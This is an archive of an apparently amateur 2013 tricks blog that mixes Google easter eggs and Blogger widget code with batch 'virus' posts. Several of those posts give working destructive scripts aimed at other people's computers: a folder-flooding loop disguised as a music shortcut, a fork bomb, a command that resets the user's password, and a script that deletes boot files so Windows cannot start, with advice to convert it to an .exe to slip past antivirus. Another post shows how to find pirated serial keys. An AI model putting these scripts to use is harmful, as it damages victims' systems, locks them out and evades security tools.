Tuesday 30 April 2013

How To make A virus That Will Make 1,000 Folders In Few Seconds

Step 1
Open notepad and type :


@echo off
:top
md %random%
goto top
@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top � return to label :top , infinite loop
Step 2
Save it as 1000folders.bat
After that you will get icon that looks as show below
People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it
Step 3
Right click on icon and click Create Shortcut
Step 4
Right click on shortcut and click properties , then click on Change Icon and rename icon
tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized
somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually�
Read more ...

How to fix windows errors

 Today i will tell your how to fix windows errors and drive volume fixer
it repairs currupted files in the hard disk and keeps your windows clean  
Ok lets Start

Go To Start
Run
Type chkdsk
And  press Enter

Now it will scan all drives and fix corrupted files and errors
Read more ...

Sunday 28 April 2013

Goglogo


Goglogo
Customize Google logo and create your own little Google with Goglogo or create one for your girlfriend/boyfriend who is lazy enough to create it herself.

Just Go To Google
Type 'Goglogo'
Click on 'I'am Feeling Luck  > Google
Read more ...

Pacman

Pacman : You remember a video game we played in childhood , eating food with our pacman. Man that was awesome plus you can now play pacman on Google and yea it's awesome.

Just Go To Google.com
Type 'Pacman'
Click on 'I'am Feeling Luck

Read more ...

Do A Barrel Roll


 Do A Barrel Roll

Just Go To Google.com
Type 'Do A Barrel Roll'
Click On Search and See My Control
Read more ...

Zerg Rush

 Zerg Rush

Just Go To Google.COM
Type 'Zerg Rush'
Read more ...

Google Sphere

Google Sphere
Sick scrolling images. Now you can revolve them around Google by using this trick.

Just Go To Google.com
Type 'Google Sphere'
Click on 'I'am Feeling Luck
Search Some Images
Read more ...

Google Gravity

Google Gravity click here and see Google.
Read more ...

Meta Tag Generator By Asad

Enter a perfect description for your blog which describes
and represents the contents of your blog.
 
Enter the Keywords separated with,
 
 
Note 
i will give you an hint here,
open Google search and start typing single keywords that
coincide with your blog content.
The keywords which are searched by max viewers will
be suggested in shadow while typing in search box
and you can use such keywords to rank well in SEO 


Enter the name of Blog Author
 
 
 
 Choose index or Follow in robots section
 
Note:
If you have a private blog and dont want search engines to crawl your blog,
then you can choose no index so that search engines wont crawl or index
your blog elements. 
 
 Now click GENERATE button and copy the generated HTML codes
and paste it right after/below the tag in your template 


Read more ...

Saturday 27 April 2013

Flying Twitter Bird Widget Generator By primal Goyal




Today i am share Flying Twitter Bird Widget Generator. Write your name and tweet  and Select a bird. Then click generate and then click add to blogger batten.  Select your blog and save it


Flying Twitter Bird Widget Generator By primal Goyal

Configure
Twitter User Name
Tweet This Text


Select A Bird




Read more ...

4 in 1 Social Subscribing Slide Out Widget For Blogger





Today I am share 4 in 1 Social Subscribing Slide Out Widget For Blogger.
If you don't have a space for your social subscribing widgets then don't worry.
I an share Hide and show them out with smooth j Query slide out hover effect.
This 4 in 1 slide out widget contains a floating facebook like box,your recent tweets, Google +1 button and feed burner email subscription.


Go to blogger.com
Go to Layout
Add a Gadget
Click HTML Javascript
 Paste the code


<div dir="ltr" style="text-align: left;" trbidi="on">
<style>
img,a {
    border: 0;
}

#on {
    visibility: visible;
}

#off {
    visibility: hidden;
}

#facebook_div {
    width: 196px;
    height: 340px;
    overflow: hidden;
}

#twitter_div {
    width: 246px;
    height: 353px;
    overflow: hidden;
}

#google_plus_div {
    width: 152px;
    height: 97px;
    overflow: hidden;
    margin-left: 50px;
    margin-top: 10px;
}

#knfeedburner_div {
    width: 300px;
    height: 97px;
    overflow: hidden;
    margin-top: 5px;
    margin-left: -4px;
}

#kakinetwork_div {
    width: 300px;
    height: 97px;
    overflow: hidden;
}/* right side style */#facebook_right {
    z-index: 10005;
    border: 2px solid #3c95d9;
    background-color: #fff;
    width: 196px;
    height: 353px;
    position: fixed;
    right: -200px;
}

#facebook_right img {
    position: absolute;
    top: -2px;
    left: -35px;
}

#facebook_right iframe {
    border: 0px solid #3c95d9;
    overflow: hidden;
    position: static;
    height: 360px;
    left: -2px;
    top: -3px;
}

#twitter_right {
    z-index: 10004;
    border: 2px solid #6CC5FF;
    background-color: #6CC5FF;
    width: 246px;
    height: 353px;
    position: fixed;
    right: -250px;
}

#twitter_right_img {
    position: absolute;
    top: -2px;
    left: -35px;
    border: 0;
}

#google_plus_right {
    z-index: 10003;
    background-color: #F2F2F2;
    border: 2px solid #006ec9;
    border-top: 2px solid #0056a0;
    border-bottom: 2px solid #0056a0;
    border-right: 2px solid #0056a0;
    border-left: hidden;
    width: 152px;
    height: 97px;
    position: fixed;
    right: -154px;
}

#google_plus_right_img {
    position: absolute;
    top: -2px;
    left: -33px;
    border: 0;
}

#feedburner_right {
    z-index: 10003;
    background-color: #fefefe;
    border: 2px solid #5b5b5b;
    border-top: 2px solid #5b5b5b;
    border-bottom: 2px solid #5b5b5b;
    border-right: 2px solid #5b5b5b;
    border-left: hidden;
    width: 300px;
    height: 97px;
    position: fixed;
    right: -303px;
}

#feedburner_right_img {
    position: absolute;
    top: -2px;
    left: -33px;
    border: 0;
}

#kakinetwork_right {
    z-index: 10003;
    border: 2px solid #303030;
    background-color: #fff;
    width: 300px;
    height: 97px;
    position: fixed;
}

#kakinetwork_right img {
    position: absolute;
    top: -2px;
    left: -101px;
}/* left side style */#facebook_left {
    z-index: 10005;
    border: 2px solid #3c95d9;
    background-color: #fff;
    width: 196px;
    height: 353px;
    position: fixed;
    left: -200px;
}

#facebook_left img {
    position: absolute;
    top: -2px;
    right: -35px;
}

#facebook_left iframe {
    border: 0px solid #3c95d9;
    overflow: hidden;
    position: static;
    height: 360px;
    right: -2px;
    top: -3px;
}

#twitter_left {
    z-index: 10004;
    border: 2px solid #6CC5FF;
    background-color: #6CC5FF;
    width: 246px;
    height: 353px;
    position: fixed;
    left: -250px;
}

#twitter_left_img {
    position: absolute;
    top: -2px;
    right: -35px;
    border: 0;
}

#google_plus_left {
    z-index: 10003;
    background-color: #006ec9;
    border: 2px solid #006ec9;
    border-top: 2px solid #0056a0;
    border-bottom: 2px solid #0056a0;
    border-left: 2px solid #0056a0;
    border-right: hidden;
    width: 152px;
    height: 97px;
    position: fixed;
    left: -154px;
}

#google_plus_left_img {
    position: absolute;
    top: -2px;
    right: -33px;
    border: 0;
}

#feedburner_left {
    z-index: 10003;
    background-color: #fefefe;
    border: 2px solid #5b5b5b;
    border-top: 2px solid #5b5b5b;
    border-bottom: 2px solid #5b5b5b;
    border-left: 2px solid #5b5b5b;
    border-right: hidden;
    width: 300px;
    height: 97px;
    position: fixed;
    left: -303px;
}

#feedburner_left_img {
    position: absolute;
    top: -2px;
    right: -33px;
    border: 0;
}

#kakinetwork_left {
    z-index: 10003;
    border: 2px solid #303030;
    background-color: #fff;
    width: 300px;
    height: 97px;
    position: fixed;
}

#kakinetwork_left img {
    position: absolute;
    top: -2px;
    right: -101px;
}

.box-title1 {
    border: 1px solid #ddd;
/*border-radius*/
    -webkit-border-radius: 6px;
    -moz-border-radius: 6px;
    border-radius: 6px;
/*box-shadow*/
    -webkit-box-shadow: 5px 5px 5px #CCCCCC;
    -moz-box-shadow: 5px 5px 5px #CCCCCC;
    box-shadow: 5px 5px 5px #CCCCCC;
    padding: 10px;
    margin: 10px 0;
}

.enteryouremail {
    background: #fff !important;
    border: 1px solid #d2d2d2;
    padding: 0px 8px 0px 8px;
    color: #a19999;
    font-size: 12px;
    height: 25px;
    width: 165px;
/*border-radius*/
    -webkit-border-radius: 5px;
    -moz-border-radius: 5px;
    border-radius: 5px;
    margin: 0px;
}

.submitbutton {
    background: #F2F2F2;
    border: 1px solid #F66303;
/*box-shadow*/
    -webkit-box-shadow: 3px 3px 3px #666;
    box-shadow: 3px 3px 3px #666;
    font: bold 12px Arial, sans-serif;
    color: #000000;
    height: 25px;
    padding: 0 12px 0 12px;
    margin: 0 0 0 5px;
/*border-radius*/
    -webkit-border-radius: 5px;
    border-radius: 5px;
    cursor: pointer;
}
</style><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
<script src="http://apis.google.com/js/plusone.js" type="text/javascript"></script>
<script type="text/javascript">jQuery(document).ready(function(){ jQuery("#facebook_right").hover(function(){ jQuery(this).stop(true,false).animate({right:  0}, 500); },function(){ jQuery("#facebook_right").stop(true,false).animate({right: -200}, 500); });    jQuery("#twitter_right").hover(function(){ jQuery(this).stop(true,false).animate({right:  0}, 500); },function(){ jQuery("#twitter_right").stop(true,false).animate({right: -250}, 500); });     jQuery("#google_plus_right").hover(function(){ jQuery(this).stop(true,false).animate({right:  0}, 500); },function(){ jQuery("#google_plus_right").stop(true,false).animate({right: -154}, 500); });    jQuery("#feedburner_right").hover(function(){ jQuery(this).stop(true,false).animate({right:  0}, 500); },function(){ jQuery("#feedburner_right").stop(true,false).animate({right: -303}, 500); });    });</script>
<br />
<div id="on">
<div id="facebook_right" style="top: 18%;">
<div id="facebook_div">
<img alt="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz4QD5SwFNpktijZ_ZnKfbQmg45_mFnRfPE43WzcGKNwuWsBzRM6UjOCO4vP6ePq_jWMEsJ4T279XMQdVYcd5KYjRPjMq8DeGR0D7P2ApkTXKJi-vCfCenNf2mHlHVnLWDA-LS-ifgTtcp/s1600/tricksteacher.blogspot.com-facebook-icon.png" />
   <iframe allowtransparency="true" frameborder="0" scrolling="no" src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fasadtariq786&amp;width=200&amp;height=346&amp;colorscheme=light&amp;show_faces=true&amp;border_color&amp;stream=false&amp;header=false" style="border: none; height: 346px; overflow: hidden; width: 200px;">
   </iframe>
  </div>
</div>
</div>
<div id="on">
<div id="twitter_right" style="top: 35%;">
<div id="twitter_div">
<img id="twitter_right_img" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKBaPWB2suy7Iy5QlZOIWpcib_WHZ5Q3CAkmTupxtyKZyWbue2YPTbU6A_VTOD4MwB799XsDonJOj-6gRVnDhCLte9pkRyajOCQUtMJB4OTbtr_qQ9UVKiFm2aGLwKKxR2_qx1I9qEBgJg/s1600/tricksteacher.blogspot.com-twitter.png" />
   <script src="http://widgets.twimg.com/j/2/widget.js"></script>
   <script>new TWTR.Widget({version: 2,type: 'profile',rpp: 4,interval: 1000,width: 246,height: 265,theme: {shell: {background: '#63BEFD',color: '#FFFFFF'},tweets: {background: '#FFFFFF',color: '#000000',links: '#47a61e'}},features: { loop: false,live: true,scrollbar: false,hashtags: false,timestamp: true,avatars: true,behavior: 'all' }}).render().setUser('asadtariq77').start();</script>
  </div>
</div>
</div>
<div id="on">
<div id="google_plus_right" style="top: 52%;">
<div id="google_plus_div">
<img id="google_plus_right_img" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ-gUzsVA-Uro8Bl4WB7vs0fSKgbDBw1DZNtcR6JEbi75cnHjtxB36wswPsov2xBHGee3sez5V-JWW2NZlAMbxjO8EZOIO5FzpZp385CXT7ESeK-WyqbFJLA6i9EU9NBEphMBe0IY7eGIq/s1600/tricksteacher.blogspot.com-google+.png" />
   <br />
<div style="float: left; margin: 10px 10px 10px 0;">
<g:plusone expr:href="data:post.url" size="tall"></g:plusone>
   </div>
</div>
</div>
<div id="on">
<div id="feedburner_right" style="top: 69%;">
<div id="knfeedburner_div">
<center>
    <h4 style="color: #f66303;">
You can also receive Free Email Updates:</h4>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=blogspot/USDlLP', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true" target="popupwindow">
<input class="enteryouremail" gtbfieldid="10" name="email" onblur="if (this.value == '') {this.value = 'Enter your email here...';}" onfocus="if (this.value == 'Enter your email here...') {this.value = '';}" type="text" value="Enter your email here..." /><input name="uri" type="hidden" value="hblogger" /><input class="submitbutton" type="submit" value="Submit" />
    </form>
</center>
<img id="feedburner_right_img" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBmBHm7QPpe_jyr3KxoB_RFMCdj0B-_J2NrC_Z1J_whUUudTQhXCmrV8oOk3niDbgpJ8PSkW03_UgBNMvt3cuI3BUKTAALy_hOpHCeIfV_t5Sw9FjAIVtU4CKS-W-6XEfVAHufMuNnST1u/s1600/tricksteacher.png" />
   </div>
</div>
</div>
</div>
</div>
 









replace asadtariq786 with your facebook fanpage username.
Replace asadtariq77 with your twitter username.
Replace blogspot/USDlLP with your feedburner username.



Read more ...

Friday 26 April 2013

How to Change Facebook Login Screen Background Picture


How to Change Facebook Login Screen Background Picture

 Go to FACEBOOK Refresh Chrome Extension.
Click Add to Chrome, then confirm by clicking Add button

  After adding the plugin to Google Chrome, Go to  chrome://chrome/extensions/   to access all Chrome extension settings.

Now scroll down until you find the installed extension (FB Refresh), then Click Options just below it.



 When you click Options, you'll be redirected to settings page of FB Refresh.
Under Image URL/Upload section you can paste the Image URL that you can find on Google Image Search or simply Upload an image of you.
After that, you have to Click on Save button in the bottom of the page.
Done! Now you can visit Facebook and notice the new Background that looks very stylish.

Read more ...

How To Empty Post on Facebook


Login Facebook Account
type the following code
@[0:0: ]

Share the Status and observe the empty status
Read more ...

Top 4 Funny Notepad Tricks

Hi friends. I am share Top 4 Funny Notepad Tricks. And all  Save as .VBS file






Top 5 Funny Notepad Tricks


Make your Computer Talks

Open Notepad Paste  code. And Save it as Talk.VBS

Dim Message, Speak
Message=InputBox("Enter Text to Talk o","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message

Open Notepad Infinitely

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Continuously Eject CD/DVD Tray

Open Notepad 
Paste code 
Save it as Eject.VBS
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


Matrix Codin

Save it as Matrix.bat

@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks

Read more ...

Wednesday 24 April 2013

Get Serial Key of Any Software




How to Get Serial Key of Any Software

 Go to Google.com
search engine 

Type this syntax

94FBR "Software"
Change "Software" to the software you are searching
Example
94FBR Avast
94FBR CLOWNFISH FOR SKYPE
94FBR office 2013

Just enter any search result and you'll find seria
Read more ...

Tuesday 23 April 2013

Backlinks Creator Tool


Hi friends. I am share  Back links Creator Tool. Make back link your blog and website. Back link creator increase your Traffic.

Please don't forget to leave your feedback or suggestion for this tool...

Note: (You will see only first 5-6 back links but don't close this page until all back links are not been created)


Read more ...

How to Create a Virus with Notepad 100% Working Tricks

Hi I am share How to How to Create a Virus with Notepad  Its really working. Make Virus and sen

How to Create your Own Virus using Batch Scripting

All code open notepad and save .bat file 

So lest start 

1 Freezes the CPU

  %0|%0
 save cpu.bat


1 Change Computer Password


@echo off
::--Change Pass To Razor--::
net user %username% Razor
::---------------------------::

 save anything.bat

Make an Infinity of Folders

@echo off
:ztuts
md %random%
goto ztuts

 


Read more ...

How to Shutdown a Computer Forever















 

 How to Shutdown a Computer Forever (Batch Virus Prank)
1) Go to: Start > Run... (Or press Windows+R )
2) Type notepad and Click OK

3) Copy the following text and paste it to Notepad:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

4) Save the file as :  Shutdown.bat

5) Convert the .Bat file to .Exe using Bat2Exe Converter
You may skip this step, but Anti-viruses will detect it as Malware.

6) Run the converted Exe file (or Bat file) in the Computer you want to harm.
7) Done! The computer will loses very important system files and won't restart again
Read more ...

Google Flag Translate Widget For Blogger/Blogspot


How To Add Google Flag Translator To Blogger


  1.     Just press the Add To Blogger Button below and this will takes to you Add Widget section.
  2.     Change title as you wish.
  3.     Hit the Add Widget button.
  4.     Drag and drop the widget as you wish
Now save it and refresh your blog.....
Read more ...

How to change your USB Flash Drive Icon

I am share How to change your USB Flash Drive Icon (Done with Windows XP but should work on All Windows Versions).


Go to Start ---> All Programs ---> Accessories ---> Notepad

Type the following:

[AutoRun]
label=��Usb Name��
ICON=icon Name.ico
 Replace Usb Name  and icon Name

Go to File ----> Save As ----> Name it autorun.inf and save it in the Root of the USB Drive

Now all you need is an Icon. Icons can be downloaded off the internet but if you have a picture you want to convert into an Icon (.ico), there are plenty of programs to do so.
I use ImageToIcon.

When you get your Icon, move it to the Root of your USB Drive along with the Autorun file.

Unplug the drive and plug it back in and you should be able to see your custom icon.
(If unplugging the drive doesn't work, try restarting the computer)

Read more ...

Monday 22 April 2013

How to Ad Floating Facebook, Google+ Twitter Buttons For Blogger
























How to Ad Floating Facebook, Google+ Twitter Buttons For Blogger


  •     Go To Blogger.com
  •     CliCk layout
  •     Click Add a Gedget
  •     Choose a HTML/JavaScript widget
  •     Paste the following code inside it,


/*-------tricksteacher------------*/
#floatdiv {
    position:absolute;
    width:94px;
    height:229px;
    top:0;
    left:0;
        z-index:100
}

#mbtsidebar {
        border:1px solid #ddd;
        padding-left:5px;
    position:relative;
    height:220px;
    width:55px;
    margin:0 0 0 5px;
}
</style>


<br />
<div id="floatdiv">
<div id="mbtsidebar">
<table cellpadding="1px" cellspacing="0">
    <tbody>
<tr>
    <td style="border-bottom: 1px solid #E8E8E8; padding: 5px 0 2px 0;"><div id="fb-root">
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like font="" href="" layout="box_count" send="false" show_faces="false"></fb:like>
    </td>
    </tr>
<tr>
    <td style="border-bottom: 1px solid #E8E8E8; padding: 5px 0px;"><g:plusone expr:href="data:post.url" size="Tall">
    </g:plusone></td>
    </tr>
<tr>
    <td style="border-bottom: 0px solid #E8E8E8; padding: 5px 0 0px 0;"><a class="twitter-share-button" data-count="vertical" data-via="Asadtariq77" href="http://twitter.com/share">Tweet</a><script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
    </td>
    </tr>
<tr>
    <td style="border-bottom: 0px solid #E8E8E8; padding: 0px 0 0px 0;"><div style="color: #dddddd; font-size: 10px; text-align: center;">
<a href="http://tricksteacher.blogspot.com/2013/04/how-to-ad-floating-facebook-google.html" style="color: #dddddd;" target="_blank">Widgets</a></div>
</td>
    </tr>
</tbody></table>
</div>
</div>
<script type="text/javascript">
// JavaScript Document

   <!--
/* Script by: www.jtricks.com
* Version: 20071017
* Latest version:
* www.jtricks.com/javascript/navigation/floating.html
*/
var floatingMenuId = 'floatdiv';
var floatingMenu =
{
    targetX: 0,
    targetY: 300,
    hasInner: typeof(window.innerWidth) == 'number',
    hasElement: typeof(document.documentElement) == 'object'
        && typeof(document.documentElement.clientWidth) == 'number',
    menu:
        document.getElementById
        ? document.getElementById(floatingMenuId)
        : document.all
          ? document.all[floatingMenuId]
          : document.layers[floatingMenuId]
};
floatingMenu.move = function ()
{
    floatingMenu.menu.style.left = floatingMenu.nextX + 'px';
    floatingMenu.menu.style.top = floatingMenu.nextY + 'px';
}
floatingMenu.computeShifts = function ()
{
    var de = document.documentElement;
    floatingMenu.shiftX =
        floatingMenu.hasInner
        ? pageXOffset
        : floatingMenu.hasElement
          ? de.scrollLeft
          : document.body.scrollLeft;
    if (floatingMenu.targetX < 0)
    {
        floatingMenu.shiftX +=
            floatingMenu.hasElement
            ? de.clientWidth
            : document.body.clientWidth;
    }
    floatingMenu.shiftY =
        floatingMenu.hasInner
        ? pageYOffset
        : floatingMenu.hasElement
          ? de.scrollTop
          : document.body.scrollTop;
    if (floatingMenu.targetY < 0)
    {
        if (floatingMenu.hasElement && floatingMenu.hasInner)
        {
            // Handle Opera 8 problems
            floatingMenu.shiftY +=
                de.clientHeight > window.innerHeight
                ? window.innerHeight
                : de.clientHeight
        }
        else
        {
            floatingMenu.shiftY +=
                floatingMenu.hasElement
                ? de.clientHeight
                : document.body.clientHeight;
        }
    }
}
floatingMenu.calculateCornerX = function()
{
    if (floatingMenu.targetX != 'center')
        return floatingMenu.shiftX + floatingMenu.targetX;
    var width = parseInt(floatingMenu.menu.offsetWidth);
    var cornerX =
        floatingMenu.hasElement
        ? (floatingMenu.hasInner
           ? pageXOffset
           : document.documentElement.scrollLeft) +
          (document.documentElement.clientWidth - width)/2
        : document.body.scrollLeft +
          (document.body.clientWidth - width)/2;
    return cornerX;
};
floatingMenu.calculateCornerY = function()
{
    if (floatingMenu.targetY != 'center')
        return floatingMenu.shiftY + floatingMenu.targetY;
    var height = parseInt(floatingMenu.menu.offsetHeight);
    // Handle Opera 8 problems
    var clientHeight =
        floatingMenu.hasElement && floatingMenu.hasInner
        && document.documentElement.clientHeight
            > window.innerHeight
        ? window.innerHeight
        : document.documentElement.clientHeight
    var cornerY =
        floatingMenu.hasElement
        ? (floatingMenu.hasInner
           ? pageYOffset
           : document.documentElement.scrollTop) +
          (clientHeight - height)/2
        : document.body.scrollTop +
          (document.body.clientHeight - height)/2;
    return cornerY;
};
floatingMenu.doFloat = function()
{
    // Check if reference to menu was lost due
    // to ajax manipuations
    if (!floatingMenu.menu)
    {
        menu = document.getElementById
            ? document.getElementById(floatingMenuId)
            : document.all
              ? document.all[floatingMenuId]
              : document.layers[floatingMenuId];
        initSecondary();
    }
    var stepX, stepY;
    floatingMenu.computeShifts();
    var cornerX = floatingMenu.calculateCornerX();
    var stepX = (cornerX - floatingMenu.nextX) * .07;
    if (Math.abs(stepX) < .5)
    {
        stepX = cornerX - floatingMenu.nextX;
    }
    var cornerY = floatingMenu.calculateCornerY();
    var stepY = (cornerY - floatingMenu.nextY) * .07;
    if (Math.abs(stepY) < .5)
    {
        stepY = cornerY - floatingMenu.nextY;
    }
    if (Math.abs(stepX) > 0 ||
        Math.abs(stepY) > 0)
    {
        floatingMenu.nextX += stepX;
        floatingMenu.nextY += stepY;
        floatingMenu.move();
    }
    setTimeout('floatingMenu.doFloat()', 20);
};
// addEvent designed by Aaron Moore
floatingMenu.addEvent = function(element, listener, handler)
{
    if(typeof element[listener] != 'function' ||
       typeof element[listener + '_num'] == 'undefined')
    {
        element[listener + '_num'] = 0;
        if (typeof element[listener] == 'function')
        {
            element[listener + 0] = element[listener];
            element[listener + '_num']++;
        }
        element[listener] = function(e)
        {
            var r = true;
            e = (e) ? e : window.event;
            for(var i = element[listener + '_num'] -1; i >= 0; i--)
            {
                if(element[listener + i](e) == false)
                    r = false;
            }
            return r;
        }
    }
    //if handler is not already stored, assign it
    for(var i = 0; i < element[listener + '_num']; i++)
        if(element[listener + i] == handler)
            return;
    element[listener + element[listener + '_num']] = handler;
    element[listener + '_num']++;
};
floatingMenu.init = function()
{
    floatingMenu.initSecondary();
    floatingMenu.doFloat();
};
// Some browsers init scrollbars only after
// full document load.
floatingMenu.initSecondary = function()
{
    floatingMenu.computeShifts();
    floatingMenu.nextX = floatingMenu.calculateCornerX();
    floatingMenu.nextY = floatingMenu.calculateCornerY();
    floatingMenu.move();
}
if (document.layers)
    floatingMenu.addEvent(window, 'onload', floatingMenu.init);
else
{
    floatingMenu.init();
    floatingMenu.addEvent(window, 'onload',
        floatingMenu.initSecondary);
}
//</script>--&gt;</div>

Replace Asadtariq77 with your Twitter username. And Save your widget

  Now Go To Blogger.com
 template
 Edit HTML
 search (ctrl+f) for this,

</head>

Just above it paste the following code,

<script src='http://apis.google.com/js/plusone.js' type='text/javascript'> {lang: &#39;en-US&#39;} </script>

And save it

Read more ...

How To Ad Boxes with CSS Effects Also Used Advertise On Your Blog website





Hello friends. Today I am share How To Ad Boxes with CSS Effects Also Used Advertise On Your Blog website This Widget increases the Beautification of your ads and inspire advertisers to advertise on your blog and website. This is great gadget Widgets. I am personal used this Widgets .

 Go to Blogger and Edit >Templates

search ]]></b:skin> (ctrl+f)



]]></b:skin>

 Paste the below code above it

/* -------------------www.tricksteacher.blogspot------------------*/
div.bsap_125 a{width:125px;display:block;font-size:11px;color:#888;font-family:verdana,sans-serif;text-align:center;text-decoration:none;overflow:hidden;float:left;line-height:100%;margin:0 4px 10px 0;}
div.bsap_125 img{border:2px solid #ddd;clear:right;padding:5px;}
div.bsap_125 a.adhere{color:#666;font-weight:bold;font-size:12px;border:2px solid #ccc;background:#e7e7e7;text-align:center;width:125px;height:125px;line-height:1000%;}
div.bsap_125 a.adhere:hover{border:2px solid #999;background:#ddd;color:#333;}
html>
body div.bsap_125 a.adhere{width:123px;height:123px;}
div.bsap_468 a{width:468px;display:block;font-size:11px;color:#888;font-family:verdana,sans-serif;text-align:center;text-decoration:none;overflow:hidden;line-height:100%;margin:0;}
div.bsap_468 img{border:0;clear:right;}
div.bsap_468 a.adhere{color:#666;font-weight:bold;font-size:12px;border:1px solid #ccc;background:#e7e7e7;text-align:center;width:468px;height:60px;line-height:480%;}
div.bsap_468 a.adhere:hover{border:1px solid #999;background:#ddd;color:#333;}
html>
body div.bsap_728 a.adhere{width:726px;height:90px;}
div.bsap_728 a{width:468px;display:block;font-size:11px;color:#888;font-family:verdana,sans-serif;text-align:center;text-decoration:none;overflow:hidden;line-height:100%;margin:0;}
div.bsap_728 img{border:0;clear:right;}
div.bsap_728 a.adhere{color:#666;font-weight:bold;font-size:12px;border:1px solid #ccc;background:#e7e7e7;text-align:center;width:128px;height:90px;line-height:730%;}
div.bsap_728 a.adhere:hover{border:1px solid #999;background:#ddd;color:#333;}
html>
body div.bsap_336 a.adhere{width:334px;height:280px;}
div.bsap_336 a{width:468px;display:block;font-size:11px;color:#888;font-family:verdana,sans-serif;text-align:center;text-decoration:none;overflow:hidden;line-height:100%;margin:0;}
div.bsap_336 img{border:0;clear:right;}
div.bsap_336 a.adhere{color:#666;font-weight:bold;font-size:12px;border:1px solid #ccc;background:#e7e7e7;text-align:center;width:336px;height:280px;line-height:2200%;}
div.bsap_336 a.adhere:hover{border:1px solid #999;background:#ddd;color:#333;}
html>
body div.bsap_468 a.adhere{width:466px;height:58px;}
.bsap a{text-shadow:1px 1px 1px #111!important;color:#eee!important;overflow:visible!important;-webkit-transition:all .2s ease;-moz-transition:all .2s ease;-o-transition:all .2s ease;border:0 none!important;-webkit-border-top-left-radius:80px;-webkit-border-bottom-right-radius:80px;-moz-border-radius-topleft:80px;-moz-border-radius-bottomright:80px;border-top-left-radius:80px;border-bottom-right-radius:80px;margin:0 10px 10px 0 !important;padding:7px!important;}
.bsap a:hover{-webkit-border-top-left-radius:40px;-webkit-border-bottom-right-radius:40px;-moz-border-radius-topleft:40px;-moz-border-radius-bottomright:40px;border-top-left-radius:40px;border-bottom-right-radius:40px;}
.bsap a img{border:0 none!important;-webkit-box-shadow:0 0 8px rgba(0,0,0,0.5);-moz-box-shadow:0 0 8px rgba(0,0,0,0.5);box-shadow:0 0 8px rgba(0,0,0,0.5);padding:3px!important;}
.bsap .even{margin-right:0!important;}
.bsap .ad1{background:#e42b2b!important;}
.bsap .ad2{background:#ff8400!important;}
.bsap .ad3{background:#a800ff!important;}
.bsap .ad4{background:#49a7f3!important;}
.bsap .ad5{background:#41d05f!important;}
.bsap .ad6{background:#B24700!important;}
.bsap .ad7{background:#FFE500!important;}
.bsap .ad8{background:#007D47!important;}
.bsap .ad9{background:#330000!important;}
.bsap .ad10{background:#990000!important;}
.bsap .ad11{background:#f70000!important;}

Ad HTML Codes

Go to blogger.com
Go to Layout
Add a Gadget
Click HTML Javascript
And Paste the code in it



125x125 Code

<center>
<div id="bsap_125" class="bsap_125 bsap">
<a href="YOUR URL" class="ad1" title="Ad Title" id="bsa_1451626" target="_blank"> <img src = "IMAGE URL"alt ="AdName"height =" 125 "width =" 125 "/> </a>
<a href="YOUR URL" class="ad2 even" title="Ad Title" target="_blank"> <img src = "IMAGE URL"alt =" AdName "height =" 125 "width =" 125 "/> </a>
<a href="YOUR URL" class="ad3" title="Ad Title" target="_blank"> <img src = "IMAGE URL "alt =" AdName "height =" 125 "width =" 125 "/> </a>
<a href="YOUR URL" class="ad4 even" title="Ad Title" target="_blank"> <img src = "IMAGE URL"alt =" AdName "height =" 125 "width =" 125 "/> </a>
</div></center>


468x60

<center>
<div id="bsap_468" class="bsap_468 bsap">
<a href="YOUR URL" class="ad5" title="Ad Title" id="bsa_1451626"
target="_blank"> <img src = "IMAGE URL "alt ="AdName"height =" 60
 "width =" 468 "/> </ a>
</ Div>
</ Center>

728x90

center>
<div id="bsap_728" class="bsap_728 bsap">
<a href="YOUR URL" class="ad6" title="Ad Title" id="bsa_1451626"
target="_blank"> <img src = "IMAGE URL "alt ="AdName"height =" 90
 "width =" 728 "/> </ a>
</ Div>
</ Center>

336x280

<center>
<div id="bsap_336" class="bsap_336 bsap">
<a href="YOUR URL" class="ad8" title="Ad Title" id="bsa_1451626"
target="_blank"> <img src = "IMAGE URL "alt ="AdName"height =" 280
 "width =" 336 "/> </ a>
</ Div>
</ Center>

Read more ...